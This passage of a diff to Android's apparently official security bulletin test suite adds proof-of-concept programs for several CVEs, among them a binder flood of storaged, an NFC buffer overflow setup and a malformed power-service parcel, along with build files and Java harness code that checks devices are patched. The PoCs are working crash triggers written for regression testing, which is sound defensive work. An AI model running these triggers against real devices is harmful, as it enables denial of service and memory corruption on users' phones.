+ read(mFdInfo, &infoOffset, sizeof(int32_t));
+ lseek(mFdData, infoOffset, SEEK_SET);
+ read(mFdData, data, infoSize);
+ return size;
+ }
+
+ virtual status_t getSize(off64_t *size) {
+ *size = 0x10000;
+ return 0;
+ }
+ virtual status_t initCheck() const { return 0; }
+};
+
+void close_resources(int fdData, int fdInfo, void *libHandle) {
+ if (fdData >= 0) {
+ ::close(fdData);
+ }
+ if (fdInfo >= 0) {
+ ::close(fdInfo);
+ }
+ if (libHandle) {
+ dlclose(libHandle);
+ }
+}
+
+int main(int argc, char **argv) {
+ if (argc < 3) {
+ return EXIT_FAILURE;
+ }
+ enable_selective_overload = ENABLE_ALL;
+ void *libHandle = dlopen(LIBNAME, RTLD_NOW | RTLD_LOCAL);
+ if (!libHandle) {
+ libHandle = dlopen(LIBNAME_APEX, RTLD_NOW | RTLD_LOCAL);
+ if (!libHandle) {
+ return EXIT_FAILURE;
+ }
+ }
+
+ GetExtractorDef getDef = (GetExtractorDef)dlsym(libHandle, "GETEXTRACTORDEF");
+ if (!getDef) {
+ dlclose(libHandle);
+ return EXIT_FAILURE;
+ }
+
+ int fdData = open(argv[1], O_RDONLY);
+ if (fdData < 0) {
+ dlclose(libHandle);
+ return EXIT_FAILURE;
+ }
+ int fdInfo = open(argv[2], O_RDONLY);
+ if (fdInfo < 0) {
+ close_resources(fdData, fdInfo, libHandle);
+ return EXIT_FAILURE;
+ }
+
+ sp<DataSource> dataSource = (sp<DataSource>)new XMFDataSource(fdData, fdInfo);
+ if (!dataSource) {
+ close_resources(fdData, fdInfo, libHandle);
+ return EXIT_FAILURE;
+ }
+
+ void *meta = nullptr;
+ FreeMetaFunc freeMeta = nullptr;
+
+ float confidence = 0.0f;
+ if (getDef().def_version == EXTRACTORDEF_VERSION_NDK_V1) {
+ getDef().u.v2.sniff(dataSource->wrap(), &confidence, &meta, &freeMeta);
+ } else if (getDef().def_version == EXTRACTORDEF_VERSION_NDK_V2) {
+ getDef().u.v3.sniff(dataSource->wrap(), &confidence, &meta, &freeMeta);
+ }
+
+ close_resources(fdData, fdInfo, libHandle);
+ enable_selective_overload = ENABLE_NONE;
+ return EXIT_SUCCESS;
+}
diff --git a/hostsidetests/securitybulletin/securityPatch/CVE-2020-0450/Android.bp b/hostsidetests/securitybulletin/securityPatch/CVE-2020-0450/Android.bp
index f8c4951..7def4e2 100644
--- a/hostsidetests/securitybulletin/securityPatch/CVE-2020-0450/Android.bp
+++ b/hostsidetests/securitybulletin/securityPatch/CVE-2020-0450/Android.bp
@@ -31,9 +31,6 @@
"-DENABLE_SELECTIVE_OVERLOADING",
],
multilib: {
- lib32: {
- suffix: "32",
- },
lib64: {
include_dirs: [
"system/nfc/src/nfc/include/",
@@ -45,7 +42,6 @@
shared_libs: [
"libnfc-nci",
],
- suffix: "64",
},
},
}
diff --git a/hostsidetests/securitybulletin/securityPatch/CVE-2020-0470/Android.bp b/hostsidetests/securitybulletin/securityPatch/CVE-2020-0470/Android.bp
index afa4a5a..7a47b0d 100644
--- a/hostsidetests/securitybulletin/securityPatch/CVE-2020-0470/Android.bp
+++ b/hostsidetests/securitybulletin/securityPatch/CVE-2020-0470/Android.bp
@@ -26,14 +26,10 @@
"poc.cpp",
],
multilib: {
- lib32: {
- suffix: "32",
- },
lib64: {
shared_libs: [
"libmediandk",
],
- suffix: "64",
},
},
}
diff --git a/hostsidetests/securitybulletin/securityPatch/CVE-2021-0330/Android.bp b/hostsidetests/securitybulletin/securityPatch/CVE-2021-0330/Android.bp
new file mode 100644
index 0000000..d15b00e
--- /dev/null
+++ b/hostsidetests/securitybulletin/securityPatch/CVE-2021-0330/Android.bp
@@ -0,0 +1,32 @@
+/*
+ * Copyright (C) 2021 The Android Open Source Project
+ *
+ * Licensed under the Apache License, Version 2.0 (the "License");
+ * you may not use this file except in compliance with the License.
+ * You may obtain a copy of the License at:
+ *
+ * http://www.apache.org/licenses/LICENSE-2.0
+ *
+ * Unless required by applicable law or agreed to in writing, software
+ * distributed under the License is distributed on an "AS IS" BASIS,
+ * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ * See the License for the specific language governing permissions and
+ * limitations under the License.
+ *
+ */
+
+package {
+ default_applicable_licenses: ["Android-Apache-2.0"],
+}
+
+cc_test {
+ name: "CVE-2021-0330",
+ defaults: ["cts_hostsidetests_securitybulletin_defaults"],
+ srcs: [
+ "poc.cpp",
+ ],
+ shared_libs: [
+ "libutils",
+ "libbinder",
+ ],
+}
diff --git a/hostsidetests/securitybulletin/securityPatch/CVE-2021-0330/poc.cpp b/hostsidetests/securitybulletin/securityPatch/CVE-2021-0330/poc.cpp
new file mode 100644
index 0000000..4d7254f
--- /dev/null
+++ b/hostsidetests/securitybulletin/securityPatch/CVE-2021-0330/poc.cpp
@@ -0,0 +1,70 @@
+/**
+ * Copyright (C) 2021 The Android Open Source Project
+ *
+ * Licensed under the Apache License, Version 2.0 (the "License");
+ * you may not use this file except in compliance with the License.
+ * You may obtain a copy of the License at
+ *
+ * http://www.apache.org/licenses/LICENSE-2.0
+ *
+ * Unless required by applicable law or agreed to in writing, software
+ * distributed under the License is distributed on an "AS IS" BASIS,
+ * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ * See the License for the specific language governing permissions and
+ * limitations under the License.
+ */
+
+#include <binder/IServiceManager.h>
+#include <binder/Parcel.h>
+#include <pthread.h>
+#include <unistd.h>
+#include "../includes/common.h"
+
+using namespace android;
+
+static int userId = 0;
+constexpr int kMaxThreads = 2;
+constexpr int kMaxUsers = 1024 * 1024;
+constexpr int kSleepDuration = 5;
+
+
+static void *trigger_onUserStarted(void *p __attribute__((unused))) {
+ sp<IServiceManager> sm = defaultServiceManager();
+ sp<IBinder> service = sm->checkService(String16("storaged"));
+
+ if (not service) {
+ return nullptr;
+ }
+
+ while (userId < kMaxUsers) {
+ Parcel data, reply;
+ data.writeInterfaceToken(service->getInterfaceDescriptor());
+ data.writeInt32(++userId);
+ service->transact(1, data, &reply, 0);
+ }
+
+ return nullptr;
+}
+
+int main() {
+ pthread_t threads[kMaxThreads];
+
+ for (int t = 0; t < kMaxThreads; ++t) {
+ pthread_create(&threads[t], nullptr, trigger_onUserStarted, nullptr);
+ }
+ for (int t = 0; t < kMaxThreads; ++t) {
+ pthread_join(threads[t], nullptr);
+ }
+
+ time_t currentTime = start_timer();
+ while (timer_active(currentTime)) {
+ sp<IServiceManager> sm = defaultServiceManager();
+ sp<IBinder> service = sm->checkService(String16("storaged"));
+ if (service) {
+ break;
+ }
+ sleep(kSleepDuration);
+ }
+
+ return EXIT_SUCCESS;
+}
diff --git a/hostsidetests/securitybulletin/securityPatch/CVE-2021-0430/Android.bp b/hostsidetests/securitybulletin/securityPatch/CVE-2021-0430/Android.bp
new file mode 100644
index 0000000..700935c
--- /dev/null
+++ b/hostsidetests/securitybulletin/securityPatch/CVE-2021-0430/Android.bp
@@ -0,0 +1,42 @@
+/*
+ * Copyright (C) 2021 The Android Open Source Project
+ *
+ * Licensed under the Apache License, Version 2.0 (the "License");
+ * you may not use this file except in compliance with the License.
+ * You may obtain a copy of the License at:
+ *
+ * http://www.apache.org/licenses/LICENSE-2.0
+ *
+ * Unless required by applicable law or agreed to in writing, software
+ * distributed under the License is distributed on an "AS IS" BASIS,
+ * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ * See the License for the specific language governing permissions and
+ * limitations under the License.
+ *
+ */
+
+package {
+ default_applicable_licenses: ["Android-Apache-2.0"],
+}
+
+cc_test {
+ name: "CVE-2021-0430",
+ defaults: ["cts_hostsidetests_securitybulletin_defaults"],
+ srcs: [
+ "poc.cpp",
+ ":cts_hostsidetests_securitybulletin_memutils",
+ ],
+ cflags: [
+ "-DCHECK_OVERFLOW",
+ ],
+ compile_multilib: "64",
+ include_dirs: [
+ "system/nfc/src/include",
+ "system/nfc/src/gki/common",
+ "system/nfc/src/nfc/include",
+ "system/nfc/src/gki/ulinux/",
+ ],
+ shared_libs: [
+ "libnfc-nci",
+ ],
+}
diff --git a/hostsidetests/securitybulletin/securityPatch/CVE-2021-0430/poc.cpp b/hostsidetests/securitybulletin/securityPatch/CVE-2021-0430/poc.cpp
new file mode 100644
index 0000000..947f46a
--- /dev/null
+++ b/hostsidetests/securitybulletin/securityPatch/CVE-2021-0430/poc.cpp
@@ -0,0 +1,87 @@
+/*
+ * Copyright (C) 2021 The Android Open Source Project
+ *
+ * Licensed under the Apache License, Version 2.0 (the "License");
+ * you may not use this file except in compliance with the License.
+ * You may obtain a copy of the License at
+ *
+ * http://www.apache.org/licenses/LICENSE-2.0
+ *
+ * Unless required by applicable law or agreed to in writing, software
+ * distributed under the License is distributed on an "AS IS" BASIS,
+ * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ * See the License for the specific language governing permissions and
+ * limitations under the License.
+ */
+
+#include <nfc_int.h>
+#include <rw_int.h>
+
+#define RW_MFC_STATE_READ_NDEF 0x03
+#define RW_MFC_SUBSTATE_READ_BLOCK 0x03
+
+extern tRW_CB rw_cb;
+
+void GKI_freebuf(void*) {
+}
+
+void GKI_start_timer(uint8_t, int32_t, bool) {
+}
+
+void GKI_stop_timer(uint8_t) {
+}
+
+void cback(tRW_EVENT, tRW_DATA*) {
+}
+
+int main() {
+ tRW_MFC_CB* p_mfc = &rw_cb.tcb.mfc;
+
+ GKI_init();
+ rw_init();
+
+ uint8_t selres = 1;
+ uint8_t uid[MFC_UID_LEN] = { 1 };
+ if (rw_mfc_select(selres, uid) != NFC_STATUS_OK) {
+ return EXIT_FAILURE;
+ }
+
+ p_mfc->state = RW_MFC_STATE_READ_NDEF;
+ p_mfc->substate = RW_MFC_SUBSTATE_READ_BLOCK;
+
+ tNFC_CONN_CB* p_cb = &nfc_cb.conn_cb[NFC_RF_CONN_ID];
+
+ tNFC_CONN* p_data = (tNFC_CONN*) malloc(sizeof(tNFC_CONN));
+ if (!p_data) {
+ return EXIT_FAILURE;
+ }
+
+ p_data->data.p_data = (NFC_HDR*) malloc(sizeof(uint8_t) * 16);
+ if (!(p_data->data.p_data)) {
+ free(p_data);
+ return EXIT_FAILURE;
+ }
+
+ p_data->data.status = NFC_STATUS_OK;
+ tNFC_CONN_EVT event = NFC_DATA_CEVT;
+
+ NFC_HDR* mfc_data = (NFC_HDR*) p_data->data.p_data;
+ mfc_data->len = 0x10;
+ mfc_data->offset = 0;
+ p_mfc->ndef_length = 1024;
+ p_mfc->p_ndef_buffer = (uint8_t*) malloc(sizeof(uint8_t) * 16);
+ if (!(p_mfc->p_ndef_buffer)) {
+ free(p_data->data.p_data);
+ free(p_data);
+ return EXIT_FAILURE;
+ }
+
+ rw_cb.p_cback = cback;
+
+ p_cb->p_cback(0, event, p_data);
+
+ free(p_mfc->p_ndef_buffer);
+ free(p_data->data.p_data);
+ free(p_data);
+ return EXIT_SUCCESS;
+}
diff --git a/hostsidetests/securitybulletin/securityPatch/CVE-2021-0439/Android.bp b/hostsidetests/securitybulletin/securityPatch/CVE-2021-0439/Android.bp
new file mode 100644
index 0000000..d03afff
--- /dev/null
+++ b/hostsidetests/securitybulletin/securityPatch/CVE-2021-0439/Android.bp
@@ -0,0 +1,35 @@
+/*
+ * Copyright (C) 2021 The Android Open Source Project
+ *
+ * Licensed under the Apache License, Version 2.0 (the "License");
+ * you may not use this file except in compliance with the License.
+ * You may obtain a copy of the License at:
+ *
+ * http://www.apache.org/licenses/LICENSE-2.0
+ *
+ * Unless required by applicable law or agreed to in writing, software
+ * distributed under the License is distributed on an "AS IS" BASIS,
+ * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ * See the License for the specific language governing permissions and
+ * limitations under the License.
+ *
+ */
+
+package {
+ default_applicable_licenses: ["Android-Apache-2.0"],
+}
+
+cc_test {
+ name: "CVE-2021-0439",
+ defaults: ["cts_hostsidetests_securitybulletin_defaults"],
+ srcs: [
+ "poc.cpp"
+ ],
+ shared_libs : [
+ "libutils",
+ "libbinder",
+ ],
+ cflags: [
+ "-DDO_NOT_CHECK_MANUAL_BINDER_INTERFACES",
+ ],
+}
diff --git a/hostsidetests/securitybulletin/securityPatch/CVE-2021-0439/poc.cpp b/hostsidetests/securitybulletin/securityPatch/CVE-2021-0439/poc.cpp
new file mode 100644
index 0000000..65cab13
--- /dev/null
+++ b/hostsidetests/securitybulletin/securityPatch/CVE-2021-0439/poc.cpp
@@ -0,0 +1,49 @@
+/*
+ * Copyright 2021 The Android Open Source Project
+ *
+ * Licensed under the Apache License, Version 2.0 (the "License");
+ * you may not use this file except in compliance with the License.
+ * You may obtain a copy of the License at
+ *
+ * http://www.apache.org/licenses/LICENSE-2.0
+ *
+ * Unless required by applicable law or agreed to in writing, software
+ * distributed under the License is distributed on an "AS IS" BASIS,
+ * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ * See the License for the specific language governing permissions and
+ * limitations under the License.
+ */
+
+#include <binder/IServiceManager.h>
+#include <binder/Parcel.h>
+
+using namespace android;
+
+int main() {
+ sp<IServiceManager> sm = defaultServiceManager();
+ sp<IBinder> binder = sm->getService(String16("power"));
+ if (!binder) {
+ return EXIT_FAILURE;
+ }
+ Parcel data, result;
+ data.writeInterfaceToken(String16("android.os.IPowerManager"));
+ char d[] = {static_cast<char>(0xc9),
+ static_cast<char>(0xa4),
+ 0x10,
+ static_cast<char>(0xd4),
+ 0x00,
+ 0x00,
+ 0x00,
+ 0x00,
+ 0x00,
+ 0x27,
+ 0x00,
+ 0x5a,
+ 0x00,
+ 0x00,
+ 0x00,
+ 0x00};
+ data.write(d, sizeof(d));
+ binder->transact(6, data, &result);
+ return EXIT_SUCCESS;
+}
diff --git a/hostsidetests/securitybulletin/securityPatch/pac/pac.cpp b/hostsidetests/securitybulletin/securityPatch/pac/pac.cpp
index 393848d..0629ec3 100644
--- a/hostsidetests/securitybulletin/securityPatch/pac/pac.cpp
+++ b/hostsidetests/securitybulletin/securityPatch/pac/pac.cpp
@@ -20,15 +20,22 @@
#include <codecvt>
#include <fstream>
#include <iostream>
+#include "../includes/common.h"
const char16_t* spec = u"";
const char16_t* host = u"";
int main(int argc, char *argv[]) {
+ bool shouldRunMultipleTimes = false;
if (argc != 2) {
- std::cout << "incorrect number of arguments" << std::endl;
- std::cout << "usage: ./pacrunner mypac.pac" << std::endl;
- return EXIT_FAILURE;
+ if (argc != 3) {
+ std::cout << "incorrect number of arguments" << std::endl;
+ std::cout << "usage: ./pacrunner mypac.pac (or)" << std::endl;
+ std::cout << "usage: ./pacrunner mypac.pac true" << std::endl;
+ return EXIT_FAILURE;
+ } else {
+ shouldRunMultipleTimes = true;
+ }
}
ProxyResolverV8Handle* handle = ProxyResolverV8Handle_new();
@@ -50,7 +57,10 @@
std::codecvt_utf8_utf16<char16_t>, char16_t>{}.from_bytes(u8Script);
ProxyResolverV8Handle_SetPacScript(handle, u16Script.data());
- ProxyResolverV8Handle_GetProxyForURL(handle, spec, host);
+ time_t currentTime = start_timer();
+ do {
+ ProxyResolverV8Handle_GetProxyForURL(handle, spec, host);
+ } while (shouldRunMultipleTimes && timer_active(currentTime));
ProxyResolverV8Handle_delete(handle);
return EXIT_SUCCESS;
diff --git a/hostsidetests/securitybulletin/src/android/security/cts/AdbUtils.java b/hostsidetests/securitybulletin/src/android/security/cts/AdbUtils.java
index 5d22ed1..cf48079 100644
--- a/hostsidetests/securitybulletin/src/android/security/cts/AdbUtils.java
+++ b/hostsidetests/securitybulletin/src/android/security/cts/AdbUtils.java
@@ -23,6 +23,7 @@
import com.android.ddmlib.IShellOutputReceiver;
import com.android.ddmlib.NullOutputReceiver;
import com.android.ddmlib.CollectingOutputReceiver;
+import com.android.tradefed.device.DeviceNotAvailableException;
import com.android.tradefed.device.ITestDevice;
import com.android.tradefed.device.NativeDevice;
import com.android.tradefed.log.LogUtil.CLog;
@@ -34,6 +35,7 @@
import java.io.OutputStream;
import java.util.concurrent.TimeoutException;
import java.util.List;
+import java.util.Map;
import java.util.regex.Pattern;
import java.util.concurrent.TimeUnit;
import java.util.Scanner;
@@ -48,8 +50,9 @@
import java.util.regex.Pattern;
import java.lang.Thread;
+
import static org.junit.Assert.*;
-import junit.framework.Assert;
+import static org.junit.Assume.*;
public class AdbUtils {
@@ -60,6 +63,7 @@
public static class pocConfig {
String binaryName;
String arguments;
+ Map<String, String> envVars;
String inputFilesDestination;
ITestDevice device;
CrashUtils.Config config;
@@ -162,8 +166,25 @@
*/
public static int runPoc(String pocName, ITestDevice device, int timeout,
String arguments, IShellOutputReceiver receiver) throws Exception {
+ return runPoc(pocName, device, timeout, arguments, null, receiver);
+ }
+
+ /**
+ * Pushes and runs a binary with arguments to the selected device and
+ * ignores any of its output.
+ *
+ * @param pocName name of the poc binary
+ * @param device device to be ran on
+ * @param timeout time to wait for output in seconds
+ * @param arguments input arguments for the poc
+ * @param envVars run the poc with environment variables
+ * @param receiver the type of receiver to run against
+ */
+ public static int runPoc(String pocName, ITestDevice device, int timeout,
+ String arguments, Map<String, String> envVars,
+ IShellOutputReceiver receiver) throws Exception {
String remoteFile = String.format("%s%s", TMP_PATH, pocName);
- SecurityTestCase.getPocPusher(device).pushFile(pocName, remoteFile);
+ SecurityTestCase.getPocPusher(device).pushFile(pocName + "_sts", remoteFile);
assertPocExecutable(pocName, device);
if (receiver == null) {
@@ -173,11 +194,26 @@
arguments = "";
}
+ String env = "";
+ if (envVars != null) {
+ StringBuilder sb = new StringBuilder();
+ for (Map.Entry<String, String> entry : envVars.entrySet()) {
+ sb
+ .append(entry.getKey().trim())
+ .append('=')
+ .append(entry.getValue().trim())
+ .append(' ');
+ }
+ env = sb.toString();
+ CLog.i("Running poc '%s' with env variables '%s'", pocName, env);
+ }
+
// since we have to return the exit status AND the poc stdout+stderr we redirect the exit
// status to a file temporarily
String exitStatusFilepath = TMP_PATH + "exit_status";
runCommandLine("rm " + exitStatusFilepath, device); // remove any old exit status
- device.executeShellCommand(TMP_PATH + pocName + " " + arguments +
+ device.executeShellCommand(
+ env + TMP_PATH + pocName + " " + arguments +
"; echo $? > " + exitStatusFilepath, // echo exit status to file
receiver, timeout, TimeUnit.SECONDS, 0);
@@ -411,7 +447,21 @@
*/
public static int runPocGetExitStatus(String pocName, String arguments, ITestDevice device,
int timeout) throws Exception {
- return runPoc(pocName, device, timeout, arguments, null);
+ return runPocGetExitStatus(pocName, arguments, null, device, timeout);
+ }
+
+ /**
+ * Pushes and runs a binary to the device and returns the exit status.
+ * @param pocName name of the poc binary
+ * @param arguments input arguments for the poc
+ * @param envVars run the poc with environment variables
+ * @param device device to be run on
+ * @param timeout time to wait for output in seconds
+ */
+ public static int runPocGetExitStatus(
+ String pocName, String arguments, Map<String, String> envVars,
+ ITestDevice device, int timeout) throws Exception {
+ return runPoc(pocName, device, timeout, arguments, envVars, null);
}
/**
@@ -434,8 +484,22 @@
*/
public static void runPocAssertExitStatusNotVulnerable(String pocName, String arguments,
ITestDevice device, int timeout) throws Exception {
+ runPocGetExitStatus(pocName, arguments, null, device, timeout);
+ }
+
+ /**
+ * Pushes and runs a binary and asserts that the exit status isn't 113: vulnerable.
+ * @param pocName name of the poc binary
+ * @param arguments input arguments for the poc
+ * @param envVars run the poc with environment variables
+ * @param device device to be ran on
+ * @param timeout time to wait for output in seconds
+ */
+ public static void runPocAssertExitStatusNotVulnerable(
+ String pocName, String arguments, Map<String, String> envVars,
+ ITestDevice device, int timeout) throws Exception {
assertTrue("PoC returned exit status 113: vulnerable",
- runPocGetExitStatus(pocName, arguments, device, timeout) != 113);
+ runPocGetExitStatus(pocName, arguments, envVars, device, timeout) != 113);
}
/**
@@ -445,9 +509,24 @@
* @param device device to be ran on
*/
public static int runProxyAutoConfig(String pacName, ITestDevice device) throws Exception {
+ return runProxyAutoConfig(pacName, null, device);
+ }
+
+ /**
+ * Runs the binary against a given proxyautoconfig file, asserting that it doesn't
+ * crash
+ * @param pacName the name of the proxy autoconfig script from the /res folder
+ * @param arguments input arguments for pacrunner
+ * @param device device to be ran on
+ */
+ public static int runProxyAutoConfig(String pacName, String arguments,
+ ITestDevice device) throws Exception {
pacName += ".pac";
String targetPath = TMP_PATH + pacName;
AdbUtils.pushResource("/" + pacName, targetPath, device);
+ if(arguments != null) {
+ targetPath += " " + arguments;
+ }
runPocAssertNoCrashes(
"pacrunner", device, targetPath,
new CrashUtils.Config().setProcessPatterns("pacrunner"));
@@ -564,8 +643,33 @@
public static void runPocAssertNoCrashesNotVulnerable(String binaryName, String arguments,
String inputFiles[], String inputFilesDestination, ITestDevice device,
String processPatternStrings[]) throws Exception {
+ runPocAssertNoCrashesNotVulnerable(binaryName, arguments, null,
+ inputFiles, inputFilesDestination, device, processPatternStrings);
+ }
+
+ /**
+ * Runs the poc binary and asserts following 3 conditions.
+ * 1. There are no security crashes in the binary.
+ * 2. There are no security crashes that match the expected process pattern.
+ * 3. The exit status isn't 113 (Code 113 is used to indicate the vulnerability condition).
+ *
+ * @param binaryName name of the binary
+ * @param arguments arguments for running the binary
+ * @param envVars run the poc with environment variables
+ * @param inputFiles files required as input
+ * @param inputFilesDestination destination directory to which input files are
+ * pushed
+ * @param device device to be run on
+ * @param processPatternStrings a Pattern string (other than binary name) to match the crash
+ * tombstone process
+ */
+ public static void runPocAssertNoCrashesNotVulnerable(
+ String binaryName, String arguments, Map<String, String> envVars,
+ String inputFiles[], String inputFilesDestination, ITestDevice device,
+ String... processPatternStrings) throws Exception {
pocConfig testConfig = new pocConfig(binaryName, device);
testConfig.arguments = arguments;
+ testConfig.envVars = envVars;
if (inputFiles != null) {
testConfig.inputFiles = Arrays.asList(inputFiles);
@@ -602,7 +706,7 @@
runCommandLine("logcat -c", testConfig.device);
try {
runPocAssertExitStatusNotVulnerable(testConfig.binaryName, testConfig.arguments,
- testConfig.device, TIMEOUT_SEC);
+ testConfig.envVars, testConfig.device, TIMEOUT_SEC);
} catch (IllegalArgumentException e) {
/*
* Since 'runPocGetExitStatus' method raises IllegalArgumentException upon
@@ -671,5 +775,9 @@
} catch (JSONException e) {}
}
fail(error.toString());
- }
+ }
+
+ public static void assumeHasNfc(ITestDevice device) throws DeviceNotAvailableException {
+ assumeTrue("nfc not available on device", device.hasFeature("android.hardware.nfc"));
+ }
}
diff --git a/hostsidetests/securitybulletin/src/android/security/cts/CVE_2016_2182.java b/hostsidetests/securitybulletin/src/android/security/cts/CVE_2016_2182.java
new file mode 100644
index 0000000..e6e1015
--- /dev/null
+++ b/hostsidetests/securitybulletin/src/android/security/cts/CVE_2016_2182.java
@@ -0,0 +1,42 @@
+/*
+ * Copyright (C) 2021 The Android Open Source Project
+ *
+ * Licensed under the Apache License, Version 2.0 (the "License");
+ * you may not use this file except in compliance with the License.
+ * You may obtain a copy of the License at
+ *
+ * http://www.apache.org/licenses/LICENSE-2.0
+ *
+ * Unless required by applicable law or agreed to in writing, software
+ * distributed under the License is distributed on an "AS IS" BASIS,
+ * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ * See the License for the specific language governing permissions and
+ * limitations under the License.
+ */
+
+package android.security.cts;
+import android.platform.test.annotations.SecurityTest;
+import org.junit.Test;
+import org.junit.runner.RunWith;
+import com.android.tradefed.testtype.DeviceJUnit4ClassRunner;
+import com.android.compatibility.common.util.CrashUtils;
+import static org.junit.Assume.assumeFalse;
+
+@RunWith(DeviceJUnit4ClassRunner.class)
+public class CVE_2016_2182 extends SecurityTestCase {
+
+ /**
+ * b/32096880
+ * Vulnerability Behaviour: SIGSEGV in self
+ */
+ @SecurityTest(minPatchLevel = "2017-03")
+ @Test
+ public void testPocCVE_2016_2182() throws Exception {
+ assumeFalse(moduleIsPlayManaged("com.google.android.conscrypt"));
+ String binaryName = "CVE-2016-2182";
+ AdbUtils.pocConfig testConfig = new AdbUtils.pocConfig(binaryName, getDevice());
+ testConfig.config = new CrashUtils.Config().setProcessPatterns(binaryName);
+ testConfig.config.checkMinAddress(false);
+ AdbUtils.runPocAssertNoCrashesNotVulnerable(testConfig);
+ }
+}
diff --git a/hostsidetests/securitybulletin/src/android/security/cts/CVE_2016_8332.java b/hostsidetests/securitybulletin/src/android/security/cts/CVE_2016_8332.java
new file mode 100644
index 0000000..9d032cd
--- /dev/null
+++ b/hostsidetests/securitybulletin/src/android/security/cts/CVE_2016_8332.java
@@ -0,0 +1,36 @@
+/*
+ * Copyright (C) 2021 The Android Open Source Project
+ *
+ * Licensed under the Apache License, Version 2.0 (the "License");
+ * you may not use this file except in compliance with the License.
+ * You may obtain a copy of the License at
+ *
+ * http://www.apache.org/licenses/LICENSE-2.0
+ *
+ * Unless required by applicable law or agreed to in writing, software
+ * distributed under the License is distributed on an "AS IS" BASIS,
+ * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ * See the License for the specific language governing permissions and
+ * limitations under the License.
+ */
+
+package android.security.cts;
+
+import android.platform.test.annotations.SecurityTest;
+import org.junit.Test;
+import org.junit.runner.RunWith;
+import com.android.tradefed.testtype.DeviceJUnit4ClassRunner;
+
+@RunWith(DeviceJUnit4ClassRunner.class)
+public class CVE_2016_8332 extends SecurityTestCase {
+
+ /**
+ * b/37761553
+ * Vulnerability Behaviour: SIGSEGV in self
+ */
+ @SecurityTest(minPatchLevel = "2017-06")
+ @Test
+ public void testPocCVE_2016_8332() throws Exception {
+ AdbUtils.runPocAssertNoCrashesNotVulnerable("CVE-2016-8332", null, getDevice());
+ }
+}
diff --git a/hostsidetests/securitybulletin/src/android/security/cts/CVE_2017_0684.java b/hostsidetests/securitybulletin/src/android/security/cts/CVE_2017_0684.java
new file mode 100644
index 0000000..4dd4b39
--- /dev/null
+++ b/hostsidetests/securitybulletin/src/android/security/cts/CVE_2017_0684.java
@@ -0,0 +1,38 @@
+/**
+ * Copyright (C) 2020 The Android Open Source Project
+ *
+ * Licensed under the Apache License, Version 2.0 (the "License");
+ * you may not use this file except in compliance with the License.
+ * You may obtain a copy of the License at
+ *
+ * http://www.apache.org/licenses/LICENSE-2.0
+ *
+ * Unless required by applicable law or agreed to in writing, software
+ * distributed under the License is distributed on an "AS IS" BASIS,
+ * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ * See the License for the specific language governing permissions and
+ * limitations under the License.
+ */
+
+package android.security.cts;
+import android.platform.test.annotations.SecurityTest;
+import org.junit.Test;
+import org.junit.runner.RunWith;
+import com.android.tradefed.testtype.DeviceJUnit4ClassRunner;
+
+@RunWith(DeviceJUnit4ClassRunner.class)
+public class CVE_2017_0684 extends SecurityTestCase {
+
+ /**
+ * b/35421151
+ * Vulnerability Behaviour: SIGSEGV in media.codec
+ */
+ @SecurityTest(minPatchLevel = "2017-07")
+ @Test
+ public void testPocCVE_2017_0684() throws Exception {
+ pocPusher.only32();
+ String errPattern[] = {"media\\.codec", "omx@\\d+?\\.\\d+?-service"};
+ AdbUtils.runPocAssertNoCrashesNotVulnerable("CVE-2017-0684", null, getDevice(),
+ errPattern);
+ }
+}
diff --git a/hostsidetests/securitybulletin/src/android/security/cts/CVE_2017_0726.java b/hostsidetests/securitybulletin/src/android/security/cts/CVE_2017_0726.java
new file mode 100644
index 0000000..5a17589
--- /dev/null
+++ b/hostsidetests/securitybulletin/src/android/security/cts/CVE_2017_0726.java
@@ -0,0 +1,38 @@
+/**
+ * Copyright (C) 2020 The Android Open Source Project
+ *
+ * Licensed under the Apache License, Version 2.0 (the "License");
+ * you may not use this file except in compliance with the License.
+ * You may obtain a copy of the License at
+ *
+ * http://www.apache.org/licenses/LICENSE-2.0
+ *
+ * Unless required by applicable law or agreed to in writing, software
+ * distributed under the License is distributed on an "AS IS" BASIS,
+ * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ * See the License for the specific language governing permissions and
+ * limitations under the License.
+ */
+
+package android.security.cts;
+import android.platform.test.annotations.SecurityTest;
+import org.junit.Test;
+import org.junit.runner.RunWith;
+import com.android.tradefed.testtype.DeviceJUnit4ClassRunner;
+
+@RunWith(DeviceJUnit4ClassRunner.class)
+public class CVE_2017_0726 extends SecurityTestCase {
+
+ /**
+ * b/36389123
+ * Vulnerability Behaviour: EXIT_VULNERABLE (113)
+ */
+ @SecurityTest(minPatchLevel = "2017-08")
+ @Test
+ public void testPocCVE_2017_0726() throws Exception {
+ pocPusher.only64();
+ String inputFiles[] = {"cve_2017_0726.mp4"};
+ AdbUtils.runPocAssertNoCrashesNotVulnerable("CVE-2017-0726",
+ AdbUtils.TMP_PATH + inputFiles[0], inputFiles, AdbUtils.TMP_PATH, getDevice());
+ }
+}
diff --git a/hostsidetests/securitybulletin/src/android/security/cts/CVE_2017_13194.java b/hostsidetests/securitybulletin/src/android/security/cts/CVE_2017_13194.java
new file mode 100644
index 0000000..ab83ce3
--- /dev/null
+++ b/hostsidetests/securitybulletin/src/android/security/cts/CVE_2017_13194.java
@@ -0,0 +1,42 @@
+/*
+ * Copyright (C) 2021 The Android Open Source Project
+ *
+ * Licensed under the Apache License, Version 2.0 (the "License");
+ * you may not use this file except in compliance with the License.
+ * You may obtain a copy of the License at
+ *
+ * http://www.apache.org/licenses/LICENSE-2.0
+ *
+ * Unless required by applicable law or agreed to in writing, software
+ * distributed under the License is distributed on an "AS IS" BASIS,
+ * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ * See the License for the specific language governing permissions and
+ * limitations under the License.
+ */
+
+package android.security.cts;
+import android.platform.test.annotations.SecurityTest;
+import org.junit.Test;
+import org.junit.runner.RunWith;
+import com.android.tradefed.testtype.DeviceJUnit4ClassRunner;
+
+import static org.junit.Assert.*;
+import static org.junit.Assume.*;
+
